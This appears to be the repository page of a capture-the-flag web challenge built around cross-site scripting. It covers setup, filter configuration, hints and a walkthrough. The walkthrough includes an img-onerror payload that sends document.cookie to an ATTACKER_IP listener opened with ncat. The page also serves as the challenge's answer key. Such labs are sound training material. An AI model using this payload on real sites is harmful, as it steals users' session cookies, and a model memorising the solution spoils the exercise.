web challenge
- Python 43.4%
- HTML 26.9%
- Dockerfile 14.7%
- CSS 12.5%
- Shell 2.5%
|
|
||
|---|---|---|
| app | ||
| docker | ||
| description.md | ||
| Dockerfile | ||
| k8s.yaml | ||
| Pipfile | ||
| Pipfile.lock | ||
| README.md | ||
| run.sh | ||
| spec.yaml | ||
It's just text
Setup
- Set the flag in
run.sh. - Execute
run.sh.
Additional configuration
app/config.py:- Change the difficulty of successful XSS by specifying strings that will
be removed in
FILTER. - Enable the Super Secret Admin Panel, where all messages are listed, by
setting
SUPER_SECRET_ADMIN_PANELtoTrue(orFalseto disable). It is available at/messagesif the flag cookie (name:flag, value:flag) is set. This page escapes code html, but there are links to the unescaped versions.
- Change the difficulty of successful XSS by specifying strings that will
be removed in
Walkthrough
- Click on
<Contact us>to get to the message page - Listen to incoming traffic on your machine (
ncat -lk 1337). - Enter an email address and a message like
<img src=invalid onerror="this.onerror=''; this.src='http://<ATTACKER_IP>:1337/' + escape(document.cookie)" /> - Decode the cookie.
Hints
- Debug your script using the message link displayed after sending a message.
<script>...</script>does not work: Maybe some tags get removed. Use something else.- Maybe you can convince the admin to deliver the flag to you.